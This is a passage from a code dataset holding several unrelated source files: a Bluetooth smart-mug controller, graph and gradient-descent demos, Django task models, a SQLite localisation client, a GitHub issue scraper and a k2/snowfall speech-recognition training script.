{0}\".format(self.isConnected))\n if platform != \"darwin\":\n # Avoid this on mac, since CoreBluetooth doesnt support pairing.\n y = await client.pair()\n print(\"Paired: {0}\".format(y))\n # Set connection parameters and use signal to send it to the UI.\n self.keepConnectionAlive = True\n # self.connectionChanged.emit(True)\n # await self.fetchLEDColor(self)\n # Auto update Temp and Battery\n # self.timer = QTimer()\n\n # Execute function every 3 seconds\n # TO-DO: Must decouple the calling of this function from the connection\n # while self.keepConnectionAlive:\n # We stay in here to keep the client alive\n # once keepConnectionAlive is set to false\n # the client will also disconnect automatically\n while self.keepConnectionAlive == True:\n await asyncio.sleep(1)\n # await asyncio.sleep(5)\n # print(\".\")\n # await asyncio.gather(\n # self.getCurrentBattery(),\n # self.getCurrentTemp(),\n # self.getTargetTemp(),\n # )\n # await asyncio.sleep(3)\n return\n except Exception as exc:\n # self.connectionChanged.emit(False)\n print(\"Error: {}\".format(exc))\n\n # # function to get the current temp from the async loop.\n # def fetchCurrentTemperature(self):\n # if self.connectedClient is not None:\n # asyncio.ensure_future(self.getCurrentTemp())\n\n # # function to get the current charge percentage from the async loop.\n # def fetchCurrentBattery(self):\n # if self.connectedClient is not None:\n # asyncio.ensure_future(self.getCurrentBattery())\n\n # Get the current temp\n async def getCurrentTemp(self):\n if await self.connectedClient.is_connected():\n currentTemp = await self.connectedClient.read_gatt_char(\n UUIDS[\"current_temp\"]\n )\n CurrentDegree = (\n float(int.from_bytes(currentTemp, byteorder=\"little\", signed=False))\n * 0.01\n )\n # Unit conversion\n if self.unit == \"F\":\n CurrentDegree = (CurrentDegree * 1.8) + 32\n CurrentDegree = round(CurrentDegree, 1)\n self.current_temp = CurrentDegree\n logging.info(\"Temp: %s\", self.current_temp)\n # await asyncio.sleep(3)\n # print(CurrentDegree)\n # Send UI Signal\n # self.getDegree.emit(float(CurrentDegree))\n else:\n # self.connectionChanged.emit(False)\n print(\"not connected\")\n\n async def getCurrentBattery(self):\n if await self.connectedClient.is_connected():\n currentBat = await self.connectedClient.read_gatt_char(UUIDS[\"current_bat\"])\n logging.info(\"Battery: %s\", float(currentBat[0]))\n # await asyncio.sleep(3)\n # Send UI Signal\n # self.getBattery.emit(float(currentBat[0]))\n else:\n # self.connectionChanged.emit(False)\n print(\"not connected\")\n\n async def getTargetTemp(self):\n if await self.connectedClient.is_connected():\n currentTemp = await self.connectedClient.read_gatt_char(\n UUIDS[\"target_temp\"]\n )\n TargetDegree = (\n float(int.from_bytes(currentTemp, byteorder=\"little\", signed=False))\n * 0.01\n )\n if self.unit == \"F\":\n TargetDegree = (TargetDegree * 1.8) + 32\n TargetDegree = round(TargetDegree, 1)\n logging.info(\"Temp: %s\", TargetDegree)\n else:\n # self.connectionChanged.emit(False)\n print(\"not connected\")\n\n async def update_values(self):\n while True:\n try:\n await self.getCurrentBattery()\n await self.getCurrentTemp()\n await self.getTargetTemp()\n await asyncio.sleep(3)\n except:\n print(\"Not connected, trying again in 10 seconds\")\n await asyncio.sleep(10)\n\n async def setToTemp(self, temp: float):\n while True:\n try:\n print(\"Trying\")\n if await self.connectedClient.is_connected():\n if self.unit == \"F\":\n temp = (temp - 32) / 1.8\n print(temp)\n print(\"try setting the target temperature\")\n convert_temp = int(temp * 1000)\n print(convert_temp)\n newtarget = bytearray(convert_temp.to_bytes(2, \"little\"))\n await self.connectedClient.write_gatt_char(\n UUIDS[\"target_temp\"], newtarget, False\n )\n return\n # Send UI Signal\n # self.getDegree.emit(float(temp * 0.01))\n\n else:\n # self.connectionChanged.emit(False)\n print(\"not connected\")\n except Exception as err:\n print(\"sleep\")\n print(err)\n await asyncio.sleep(5)\n","sub_path":"mug/mug.py","file_name":"mug.py","file_ext":"py","file_size_in_byte":7577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"483883424","text":"\"\"\"\nAPP-Q2:\n\n\"\"\"\n\nimport random\nimport matplotlib.pyplot as plt\n \nimport graph_degree_dist as dist\n\ndef make_er_graph(num_nodes, prob):\n\ter_graph = dict()\n\tnodes = set([i for i in xrange(num_nodes)])\n\tfor src in xrange(num_nodes):\n\t\ter_graph[src] = []\n\t\tdest_candidates = set(nodes)\n\t\tdest_candidates.remove(src)\n\t\tfor dest in dest_candidates:\n\t\t\tif random.random() < prob:\n\t\t\t\ter_graph[src].append(dest)\n\treturn er_graph\n\ner_graph = make_er_graph(1000, 0.05)\nin_degree_dist = dist.in_degree_distribution(er_graph)\ndist.plot_dist(in_degree_dist, 'bo',\n\t'In-degree (log scale)',\n\t'Probability (log scale)',\n\t'In-degree distribution of ER directed graph')","sub_path":"week1/app/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"465312776","text":"\"\"\"\nproblem_010\n\n조합을 나타내는 식을 함수로 만들어보세요.\n\n팩토리얼 함수를 이용하여도 좋습니다.\n\"\"\"\n\ndef my_combination(a,b):\n \n if a < b:\n return False\n \n a_b = a - b\n \n for a_i in range(1, a):\n a *= a_i\n for b_i in range(1, b):\n b *= b_i\n for ab_i in range(1, a_b):\n a_b *= ab_i\n\n return int(a / (a_b * b))\n\nprint(my_combination(5,3))","sub_path":"algorithm/stud_group/problem_010.py","file_name":"problem_010.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"105209892","text":"import sys\nfrom collections import defaultdict\nfrom ROOT import TGraph, TVectorF, TCanvas, TH1F, kRed\nfrom JMTucker.Tools.ROOTTools import *\nfrom itertools import izip\nimport random\nfrom FWCore.PythonUtilities import LumiList\n\nheader = ['Run:Fill', 'LS', 'UTCTime', 'Beam Status', 'E(GeV)', 'Del(/nb)', 'Rec(/nb)', 'avgPU']\nps = plot_saver('plots_lumibyls_V3', size=(600,600))\n\ninfo = ()\n\ni = 0\n\nthis_fill = 0\nthis_run = 0\nthis_fill_rec = []\nthis_fill_apu = []\nthis_run_pos = []\n\nlumis = []\npileups = []\ntimes = []\nfill = 0\n\nsum_luminosity = 0\nsum_luminosity2 = 0\nmax_ls = 167.147\nrandom.seed()\n\nlluminosity = []\nlpileup = []\nllumisec = []\nlrun = []\n\n# All\nh_pileup = TH1F(\"h_pileup\",\"h_pileup\",100,0,50)\nh_w_pileup = TH1F(\"h_w_pileup\",\"h_w_pileup\",100,0,50)\nh_w_pileup.Sumw2()\n\nh_luminosity = TH1F(\"h_luminosity\",\"h_luminosity\",200,0,170)\nh_w_luminosity = TH1F(\"h_w_luminosity\",\"h_w_luminosity\",200,0,170)\nh_w_luminosity.Sumw2()\n\n# Random Pick\nh_pileup_picked = TH1F(\"h_pileup_picked\",\"h_pileup_picked\",100,0,50)\nh_w_pileup_picked = TH1F(\"h_w_pileup_picked\",\"h_w_pileup_picked\",100,0,50)\nh_w_pileup_picked.Sumw2()\n\n# Shaped distribution\nh_shaped_pileup = TH1F(\"h_shaped_pileup\",\"h_shaped_pileup\",100,0,50)\nh_w_shaped_pileup = TH1F(\"h_w_shaped_pileup\",\"h_w_shaped_pileup\",100,0,50)\nh_w_shaped_pileup.Sumw2()\n\nh_shaped_luminosity = TH1F(\"h_shaped_luminosity\",\"h_shaped_luminosity\",200,0,170)\nh_w_shaped_luminosity = TH1F(\"h_w_shaped_luminosity\",\"h_w_shaped_luminosity\",200,0,170)\nh_w_shaped_luminosity.Sumw2()\n\nfor line in open(sys.argv[1]):\n line = line.split('|')\n #print len(line), line\n if len(line) != 10:\n continue\n line = [x.strip() for x in line if x.strip()]\n\n run_fill, ls, time, status, energy, delivered, recorded, avgpu = line\n \n if fill != \"Fill\":\n fill_m1 = int(fill)\n \n try:\n run, fill = run_fill.split(':')\n run = int(run)\n fill = int(fill)\n ls = int(ls.split(':')[0])\n recorded = float(recorded)\n avgpu = float(avgpu)\n except ValueError:\n assert line == header\n continue\n \n #print '%i,%i,%i,%s,%g,%g' % (i,fill,run,time,recorded,avgpu)\n\n #print \"lumi=\",ls,\" pileup=\",avgpu\n \n assert fill >= this_fill\n assert run >= this_run\n\n# if avgpu < 4:\n # print \"Fill with small pileup=\",fill\n # print \"Run with small pileup=\",run\n\n lluminosity.append(recorded)\n lpileup.append(avgpu)\n llumisec.append(ls)\n lrun.append(run)\n \n if fill_m1 != fill:\n i = 0\n Luminosity = TVectorF(221878)\n Pileup = TVectorF(221878)\n Time = TVectorF(221878)\n lumis.append(Luminosity)\n pileups.append(Pileup)\n times.append(Time)\n\n #print i,fill_m1,fill\n \n Luminosity[i] = recorded\n Pileup[i] = avgpu\n zeit = time.split(\" \")[1] # FIX TIME\n Zeit = int(int(zeit.split(\":\")[0])*3600+int(zeit.split(\":\")[1])*60+int(zeit.split(\":\")[2]))\n Time[i] = Zeit\n i += 1\n\nfor rec,pu in izip(lluminosity,lpileup):\n h_pileup.Fill(pu)\n h_luminosity.Fill(rec)\n h_w_pileup.Fill(pu,rec)\n\nlumi_list = LumiList.LumiList('Cert_190456-208686_8TeV_22Jan2013ReReco_Collisions12_JSON.txt')\nreduced_lumi_list = LumiList.LumiList()\n\nwhile sum_luminosity2 < 1000000.:\n x = random.randint(0,221878)\n sum_luminosity2 += lluminosity[x]\n h_pileup_picked.Fill(lpileup[x])\n h_w_pileup_picked.Fill(lpileup[x],lluminosity[x])\n if lumi_list.contains(lrun[x],llumisec[x]):\n reduced_lumi_list = reduced_lumi_list + LumiList.LumiList('',[[lrun[x],llumisec[x]]])\n\nreduced_lumi_list.writeJSON('picked_data_JSON.txt')\n \n \nh_pileup.DrawNormalized()\nh_pileup_picked.SetLineColor(kRed)\nh_pileup_picked.DrawNormalized()\nh_pileup.DrawNormalized(\"same\")\nps.save(\"h_pileup_norm\")\n\nh_w_pileup_picked.SetLineColor(kRed)\nh_w_pileup_picked.DrawNormalized()\nh_w_pileup.DrawNormalized(\"same\")\nps.save(\"h_w_pileup_norm\")\n\n \n#count=0\n#print \"How many fills? \",len(lumis),len(pileups),len(times)\n#for i,j,k in izip(lumis,pileups,times):\n# h1=TGraph(k,i)\n# h1.Draw(\"AP\")\n# ps.save(\"Lumi\"+str(count))\n# h2=TGraph(k,j)\n# h2.Draw(\"AP\")\n# ps.save(\"Pileup\"+str(count))\n# count +=1\n\n","sub_path":"MFVNeutralino/test/lumibyls.py","file_name":"lumibyls.py","file_ext":"py","file_size_in_byte":4190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"149523948","text":"# Behnam Asadi \n# http://ros-developer.com\n# To see the function that we are working on visit:\n# http://ros-developer.com/2017/05/07/gradient-descent-method-for-finding-the-minimum/\n# or simply put the following latex code in a latex doc:\n# $$ z= -( 4 \\times e^{- ( (x-4)^2 +(y-4)^2 ) }+ 2 \\times e^{- ( (x-2)^2 +(y-2)^2 ) } )$$\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n\ndef objective_function(x,y):\n z=-( 4*np.exp(-(x-4)**2 - (y-4)**2)+2*np.exp(-(x-2)**2 - (y-2)**2) )\n return z\n\n\ndef f_prim(x,y):\n f_x=-( (-2)*(x-4)*4*np.exp(-(x-4)**2 - (y-4)**2) + (-2)*(x-2)*2*np.exp(-(x-2)**2 - (y-2)**2) )\n f_y=-( (-2)*(y-4)*4*np.exp(-(x-4)**2 - (y-4)**2) + (-2)*(y-2)*2*np.exp(-(x-2)**2 - (y-2)**2) )\n return [f_x,f_y]\n\n \nx = np.linspace(-2,10,200)\ny = np.linspace(-2,10,200)\n\nX, Y = np.meshgrid(x,y)\n\nZ=objective_function(X,Y)\n\n\n#Make a 3D plot\nfig = plt.figure()\nax = fig.gca(projection='3d')\nax.plot_surface(X, Y, Z,linewidth=0,cmap='coolwarm')\n\nax.set_xlabel('X axis')\nax.set_ylabel('Y axis')\nax.set_zlabel('Z axis')\n\n\nX_old=-2\nY_old=0\n\n\n# The starts point for the algorithm:\nX_new=4\nY_new=2.2\n\n# step size\nepsilon=0.1\n\n# stop criteria\nprecision = 0.00001\n\n\n\nx_path_to_max=[]\ny_path_to_max=[]\nz_path_to_max=[]\n\n\n\nwhile np.sqrt( (X_new-X_old)**2 + (Y_new-Y_old)**2 ) > precision:\n X_old=X_new\n Y_old=Y_new\n \n #[X_new,Y_new]=f_prim(X_new,Y_new)\n #print f_prim(X_new,Y_new)\n x_path_to_max.append(X_new )\n y_path_to_max.append(Y_new )\n z=objective_function(X_new,Y_new)\n z_path_to_max.append(z)\n \n ret_val=f_prim(X_old,Y_old)\n X_new=X_old-epsilon*ret_val[0]\n Y_new=Y_old-epsilon*ret_val[1]\n# print X_new\n# print Y_new\n \n \n\nline1=plt.plot(x_path_to_max,y_path_to_max,z_path_to_max)\nplt.setp(line1,color='g',linewidth=0.5)\n\n\n#print X_new\n#print Y_new\nplt.show()\n\n\n","sub_path":"Machine_Learning_Univ_Course_(2017Fall)/Extra_hw/Extra_hw02/gradDescent/grad_desc9.py","file_name":"grad_desc9.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"240655038","text":"from django.db import models\nfrom django.core.urlresolvers import reverse\nfrom django.utils.http import urlquote\nfrom django.utils.timesince import timesince, timeuntil\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom core.models import Slugged, base_concrete_model, DateStamp\n\nfrom projects.models import Project\nimport reversion\n\ndef get_sentinel_category():\n return TaskCategory.objects.get_or_create(title='Deleted')[0]\n\nclass Task(Slugged):\n project = models.ForeignKey(Project)\n category = models.ForeignKey('TaskCategory', blank=True, null=True,\n on_delete=models.SET(get_sentinel_category))\n projected_completion_date = models.DateField(_(\"Projected Completion Date\"),\n blank=True, null=True)\n completion_date = models.DateField(_(\"Actual Completion Date\"),\n blank=True, null=True)\n description = models.TextField(blank=True)\n expense = models.IntegerField(blank=True)\n price = models.IntegerField(blank=True, verbose_name=_('Markup'))\n\n class Meta:\n order_with_respect_to = 'project'\n\n def save(self, *args, **kwargs):\n if not self.category:\n self.category = get_sentinel_category()\n super(Task, self).save(*args, **kwargs)\n\n\n def get_absolute_url(self):\n return reverse('tasks:task-detail', kwargs={'pk': self.pk})\n\n def get_update_url(self):\n return reverse('tasks:task-update', kwargs={'pk': self.pk})\n\n def due_date_until(self):\n if self.projected_completion_date:\n return timeuntil(self.projected_completion_date)\n\n def due_date_since(self):\n if self.projected_completion_date:\n return timesince(self.projected_completion_date)\n\n def get_status(self):\n if self.project.start_time:\n if self.completion_date:\n result = 2\n else:\n result = 1\n else:\n result = 0\n return result\n\n def get_project_category_totals(self):\n result_dict = {}\n all_categories = TaskCategory.objects.all()\n all_tasks = Task.objects.filter(project=self.project)\n all_categories = all_categories.order_by('order')\n for cat in all_categories:\n cat_tasks = all_tasks.filter(category=cat)\n if cat_tasks:\n cat_exp_total = sum(cat_tasks.values_list('expense', flat=True))\n cat_price_total = sum(cat_tasks.values_list('price', flat=True))\n result_dict[cat.slug] = {\n 'id': cat.id,\n 'title': cat.title,\n 'expense': cat_exp_total,\n 'price': cat_price_total,\n 'total': sum([cat_exp_total, cat_price_total]),\n 'tasks': cat_tasks\n }\n return result_dict\n\n due_date_since.short_description = _(\"Late by\")\n due_date_until.short_description = _(\"Due in\")\nreversion.register(Task)\n\n\nclass TaskCategory(Slugged):\n parent = models.ForeignKey(\"TaskCategory\", blank=True, null=True,\n related_name=\"children\", on_delete=models.SET_NULL)\n ascendants = models.CharField(editable=False, max_length=100, null=True)\n order = models.IntegerField(blank=True, null=True)\n description = models.TextField(blank=True)\n\n class Meta:\n ordering = ('_order', 'order', 'ascendants')\n order_with_respect_to = 'parent'\n\n def save(self, *args, **kwargs):\n\n if self.parent is None:\n self._order = self.order\n\n if self.ascendants:\n if not self.id in [int(ascendant) for ascendant in self.ascendants.split(',')[:-1]]:\n if self.update_descendants():\n super(TaskCategory, self).save(*args, **kwargs)\n else:\n #print 'error: self id in ascendants'\n pass\n else:\n super(TaskCategory, self).save(*args, **kwargs)\n self.update_descendants()\n\n def update_descendants(self):\n current_ascendants = self.ascendants\n #print 'current: ' + str(current_ascendants)\n\n ascendants = [str(self.id)]\n parent = self.parent\n while parent is not None and parent is not self:\n ascendants.insert(0, str(parent.id))\n if parent.parent:\n parent = parent.parent\n else:\n #the while condition will set parent to None and we cant validate it so we end the loop before this\n #while the parent is not None\n break\n if parent == self:\n break\n\n if parent != self or parent is None:\n #print 'parent safe'\n ascendants = \",\".join(ascendants)\n self.ascendants = ascendants\n\n if ascendants != current_ascendants or ascendants is None:\n super(TaskCategory, self).save(update_fields=['ascendants'])\n #print 'new : ' + str(self.ascendants)\n\n children = self.children.all()\n if children:\n for child in children:\n child.update_descendants()\n return True\n else:\n return False\n\n\n def get_update_url(self):\n return reverse('tasks:task-category-update', kwargs={'pk': self.pk})\n\n def get_project_category_price(self, project):\n total = 0\n for p in project.task_set.filter(category=self):\n total += p.price\n return total\n\n def get_project_category_expense(self, project):\n total = 0\n for p in project.task_set.filter(category=self):\n total += p.expense\n return total\n\nreversion.register(TaskCategory, follow=['task_set'], exclude=[\"created, modified\"])\n\n\nclass CategoryBundle(Slugged):\n categories = models.ManyToManyField(TaskCategory, null=True, blank=True, related_name='bundles')\n\n def get_update_url(self):\n return reverse('tasks:bundle-update', kwargs={'pk': self.pk})\n","sub_path":"cpm/tasks/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"94830120","text":"\nimport unittest\nimport numpy as np\n\nfrom use_generator import Generator\nfrom template import Template\nfrom molecules import Water, Atom, Property, Molecule, Rotator\n\nclass WaterTest( unittest.TestCase ):\n\n def setUp(self):\n self.ut_alpha = np.random.random( (6, ) )\n self.ut_beat = np.random.random( (10, ) )\n\n self.g = Generator()\n self.w = self.g.get_mol( center = np.random.uniform( -10, 10, [3] ), mol = \"water\" )\n\n self.t1 = np.random.uniform( 0, np.pi/2 )\n self.t2 = np.random.uniform( 0, np.pi )\n self.t3 = np.random.uniform( 0, np.pi/2 )\n\n\n def test_negative_y_get_euler(self):\n\n w = self.g.get_mol( center = [0,0,0], mol = \"water\" )\n\n t1 = 0\n t2 = 0\n t3 = 0\n\n t1 = np.pi/2\n #t2 = np.pi/2\n #t3 = np.pi/2\n\n #t1, t2, t3 = w.get_euler()\n Rz1 = Rotator.get_Rz( t1 )\n #Ry = Molecule.get_Ry_inv( t2 )\n #Rz2 = Molecule.get_Rz( t3 )\n\n\n\n #assert isinstance( w, )\n\n\n\n def eq(self, a, b):\n np.testing.assert_almost_equal( a, b, decimal = 3)\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"src/test/test_operators.py","file_name":"test_operators.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"127724362","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.6-i386/egg/silme/io/sqlite.py\n# Compiled at: 2010-06-12 17:55:55\nimport silme.io\nfrom silme.io.clients import IOClient, DBClient\nfrom silme.core import L10nPackage, L10nObject, EntityList, Object, Entity\nimport os\nfrom pysqlite2 import dbapi2 as sqlite\n\ndef register(Manager):\n Manager.register(SQLiteClient)\n\n\nclass SQLiteClient(DBClient):\n name = 'sqlite'\n desc = 'SQLite reader/writer'\n type = IOClient.__name__\n\n @classmethod\n def matches_path(cls, path):\n \"\"\"\n tests if the ioclient should be used for this type of path\n Matches any sqlite:\n \"\"\"\n return path.startswith('sqlite:')\n\n @classmethod\n def get_entitylist(cls, path, source=False, code='default', parser=None):\n entityList = EntityList()\n (path, table) = cls._explode_path(path)\n con = cls._connected()\n if not con:\n cls._connect(path)\n cursor = cls.connection.cursor()\n cursor.execute('SELECT * FROM ' + table)\n for row in cursor:\n entitylist.add_entity(Entity(row[0], row[1]))\n\n cursor.close()\n if not con:\n cls._close()\n return entitylist\n\n @classmethod\n def get_l10npackage(cls, path, load_objects=True):\n l10npackage = L10nPackage()\n cls._connect(path)\n l10npackage.id = os.path.basename(path)\n l10npackage.objects['L10nTable'] = L10nObject(cls.build_entitylist(path, 'L10nTable'))\n cls._close()\n return l10npackage\n\n @classmethod\n def _explode_path(cls, path):\n return (\n path, 'l10n')\n\n @classmethod\n def _connect(cls, path):\n cls.connection = sqlite.connect(path)\n\n def _close(cls):\n if cls._connected():\n cls.connection.close()\n cls.connection = None\n return\n\n def _connected():\n return bool(cls.connection)","sub_path":"pycfiles/silme-0.8.1-py2.5/sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"451389628","text":"import urllib.request\nfrom bs4 import BeautifulSoup\n\nlist_sites = []\nnum = 58\n\nfor i in range(1, num):\n url = 'https://github.com/reek/anti-adblock-killer/issues?page=' + str(i) + '&q=is%3Aissue+is%3Aopen'\n with urllib.request.urlopen(url) as response:\n html = response.read()\n soup = BeautifulSoup(html, 'html.parser')\n #pretty_html = soup.prettify()\n #with open(str(i) + '.hmtl', 'w') as f:\n # f.write(pretty_html)\n all_links = soup.find_all(\"a\", class_=\"link-gray-dark no-underline h4 js-navigation-open\")\n for link in all_links:\n site = link.string.rstrip().lstrip()\n if site:\n #print(site)\n list_sites.append(site)\nprint(len(list_sites))\n\nwith open('reek.txt', 'w') as f:\n for site in list_sites:\n f.write(site + '\\n')\n","sub_path":"Code/reek_issues.py","file_name":"reek_issues.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"265085652","text":"#!/usr/bin/env python3\n\n# Copyright (c) 2020 Xiaomi Corporation (authors: Daniel Povey\n# Haowen Qiu\n# Fangjun Kuang)\n# 2021 University of Chinese Academy of Sciences (author: Han Zhu)\n# Apache 2.0\n\nimport argparse\nimport logging\nimport os\nimport sys\nfrom datetime import datetime\nfrom pathlib import Path\nfrom typing import Dict, Optional\n\nimport k2\nimport numpy as np\nimport torch\nimport torch.distributed as dist\nimport torch.multiprocessing as mp\nfrom torch import nn\nfrom torch.cuda.amp import GradScaler, autocast\nfrom torch.nn.parallel import DistributedDataParallel as DDP\nfrom torch.nn.utils import clip_grad_value_\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom lhotse.utils import fix_random_seed, nullcontext\nfrom snowfall.common import describe, str2bool\nfrom snowfall.common import load_checkpoint, save_checkpoint\nfrom snowfall.common import save_training_info\nfrom snowfall.common import setup_logger\nfrom snowfall.data.librispeech import LibriSpeechAsrDataModule\nfrom snowfall.dist import cleanup_dist\nfrom snowfall.dist import setup_dist\nfrom snowfall.lexicon import Lexicon\nfrom snowfall.models import AcousticModel\nfrom snowfall.models.conformer import Conformer\nfrom snowfall.models.contextnet import ContextNet\nfrom snowfall.models.tdnn_lstm import TdnnLstm1b # alignment model\nfrom snowfall.models.transformer import Noam, Transformer\nfrom snowfall.objectives import LFMMILoss, encode_supervisions\nfrom snowfall.training.diagnostics import measure_gradient_norms, optim_step_and_measure_param_change\nfrom snowfall.training.mmi_graph import MmiTrainingGraphCompiler\nfrom snowfall.training.mmi_graph import create_bigram_phone_lm\n\n\ndef get_objf(batch: Dict,\n model: AcousticModel,\n ali_model: Optional[AcousticModel],\n P: k2.Fsa,\n device: torch.device,\n graph_compiler: MmiTrainingGraphCompiler,\n use_pruned_intersect: bool,\n is_training: bool,\n is_update: bool,\n accum_grad: int = 1,\n den_scale: float = 1.0,\n att_rate: float = 0.0,\n tb_writer: Optional[SummaryWriter] = None,\n global_batch_idx_train: Optional[int] = None,\n optimizer: Optional[torch.optim.Optimizer] = None,\n scaler: GradScaler = None\n ):\n feature = batch['inputs']\n # at entry, feature is [N, T, C]\n feature = feature.permute(0, 2, 1) # now feature is [N, C, T]\n assert feature.ndim == 3\n feature = feature.to(device)\n\n supervisions = batch['supervisions']\n supervision_segments, texts = encode_supervisions(supervisions)\n\n loss_fn = LFMMILoss(\n graph_compiler=graph_compiler,\n P=P,\n den_scale=den_scale,\n use_pruned_intersect=use_pruned_intersect\n )\n\n grad_context = nullcontext if is_training else torch.no_grad\n\n with autocast(enabled=scaler.is_enabled()), grad_context():\n\n if att_rate == 0:\n # Note: Make TorchScript happy by making the supervision dict strictly\n # conform to type Dict[str, Tensor]\n # Using the attention decoder with TorchScript is currently unsupported,\n # we'll need to separate out the 'text' field from 'supervisions' first.\n del supervisions['text']\n\n nnet_output, encoder_memory, memory_mask = model(feature, supervisions)\n if att_rate != 0.0:\n att_loss = model.module.decoder_forward(encoder_memory, memory_mask, supervisions, graph_compiler)\n\n if (ali_model is not None and global_batch_idx_train is not None and\n global_batch_idx_train // accum_grad < 4000):\n with torch.no_grad():\n ali_model_output = ali_model(feature)\n # subsampling is done slightly differently, may be small length\n # differences.\n min_len = min(ali_model_output.shape[2], nnet_output.shape[2])\n # scale less than one so it will be encouraged\n # to mimic ali_model's output\n ali_model_scale = 500.0 / (global_batch_idx_train // accum_grad + 500)\n nnet_output = nnet_output.clone() # or log-softmax backprop will fail.\n nnet_output[:, :,:min_len] += ali_model_scale * ali_model_output[:, :,:min_len]\n\n # nnet_output is [N, C, T]\n nnet_output = nnet_output.permute(0, 2, 1) # now nnet_output is [N, T, C]\n\n mmi_loss, tot_frames, all_frames = loss_fn(nnet_output, texts, supervision_segments)\n\n if is_training:\n def maybe_log_gradients(tag: str):\n if tb_writer is not None and global_batch_idx_train is not None and global_batch_idx_train % 200 == 0:\n tb_writer.add_scalars(\n tag,\n measure_gradient_norms(model, norm='l1'),\n global_step=global_batch_idx_train\n )\n\n if att_rate != 0.0:\n loss = (- (1.0 - att_rate) * mmi_loss + att_rate * att_loss) / (len(texts) * accum_grad)\n else:\n loss = (-mmi_loss) / (len(texts) * accum_grad)\n scaler.scale(loss).backward()\n if is_update:\n maybe_log_gradients('train/grad_norms')\n scaler.unscale_(optimizer)\n clip_grad_value_(model.parameters(), 5.0)\n maybe_log_gradients('train/clipped_grad_norms')\n if tb_writer is not None and (global_batch_idx_train // accum_grad) % 200 == 0:\n # Once in a time we will perform a more costly diagnostic\n # to check the relative parameter change per minibatch.\n deltas = optim_step_and_measure_param_change(model, optimizer, scaler)\n tb_writer.add_scalars(\n 'train/relative_param_change_per_minibatch',\n deltas,\n global_step=global_batch_idx_train\n )\n else:\n scaler.step(optimizer)\n optimizer.zero_grad()\n scaler.update()\n\n ans = -mmi_loss.detach().cpu().item(), tot_frames.cpu().item(\n ), all_frames.cpu().item()\n return ans\n\n\ndef get_validation_objf(dataloader: torch.utils.data.DataLoader,\n model: AcousticModel,\n ali_model: Optional[AcousticModel],\n P: k2.Fsa,\n device: torch.device,\n graph_compiler: MmiTrainingGraphCompiler,\n use_pruned_intersect: bool,\n scaler: GradScaler,\n den_scale: float = 1,\n ):\n total_objf = 0.\n total_frames = 0. # for display only\n total_all_frames = 0. # all frames including those seqs that failed.\n\n model.eval()\n\n from torchaudio.datasets.utils import bg_iterator\n for batch_idx, batch in enumerate(bg_iterator(dataloader, 2)):\n objf, frames, all_frames = get_objf(\n batch=batch,\n model=model,\n ali_model=ali_model,\n P=P,\n device=device,\n graph_compiler=graph_compiler,\n use_pruned_intersect=use_pruned_intersect,\n is_training=False,\n is_update=False,\n den_scale=den_scale,\n scaler=scaler\n )\n total_objf += objf\n total_frames += frames\n total_all_frames += all_frames\n\n return total_objf, total_frames, total_all_frames\n\n\ndef train_one_epoch(dataloader: torch.utils.data.DataLoader,\n valid_dataloader: torch.utils.data.DataLoader,\n model: AcousticModel,\n ali_model: Optional[AcousticModel],\n P: k2.Fsa,\n device: torch.device,\n graph_compiler: MmiTrainingGraphCompiler,\n use_pruned_intersect: bool,\n optimizer: torch.optim.Optimizer,\n accum_grad: int,\n den_scale: float,\n att_rate: float,\n current_epoch: int,\n tb_writer: SummaryWriter,\n num_epochs: int,\n global_batch_idx_train: int,\n world_size: int,\n scaler: GradScaler\n ):\n \"\"\"One epoch training and validation.\n\n Args:\n dataloader: Training dataloader\n valid_dataloader: Validation dataloader\n model: Acoustic model to be trained\n P: An FSA representing the bigram phone LM\n device: Training device, torch.device(\"cpu\") or torch.device(\"cuda\", device_id)\n graph_compiler: MMI training graph compiler\n optimizer: Training optimizer\n accum_grad: Number of gradient accumulation\n den_scale: Denominator scale in mmi loss\n att_rate: Attention loss rate, final loss is att_rate * att_loss + (1-att_rate) * other_loss\n current_epoch: current training epoch, for logging only\n tb_writer: tensorboard SummaryWriter\n num_epochs: total number of training epochs, for logging only\n global_batch_idx_train: global training batch index before this epoch, for logging only\n\n Returns:\n A tuple of 3 scalar: (total_objf / total_frames, valid_average_objf, global_batch_idx_train)\n - `total_objf / total_frames` is the average training loss\n - `valid_average_objf` is the average validation loss\n - `global_batch_idx_train` is the global training batch index after this epoch\n \"\"\"\n total_objf, total_frames, total_all_frames = 0., 0., 0.\n valid_average_objf = float('inf')\n time_waiting_for_batch = 0\n forward_count = 0\n prev_timestamp = datetime.now()\n\n model.train()\n for batch_idx, batch in enumerate(dataloader):\n forward_count += 1\n if forward_count == accum_grad:\n is_update = True\n forward_count = 0\n else:\n is_update = False\n\n global_batch_idx_train += 1\n timestamp = datetime.now()\n time_waiting_for_batch += (timestamp - prev_timestamp).total_seconds()\n\n if forward_count == 1 or accum_grad == 1:\n 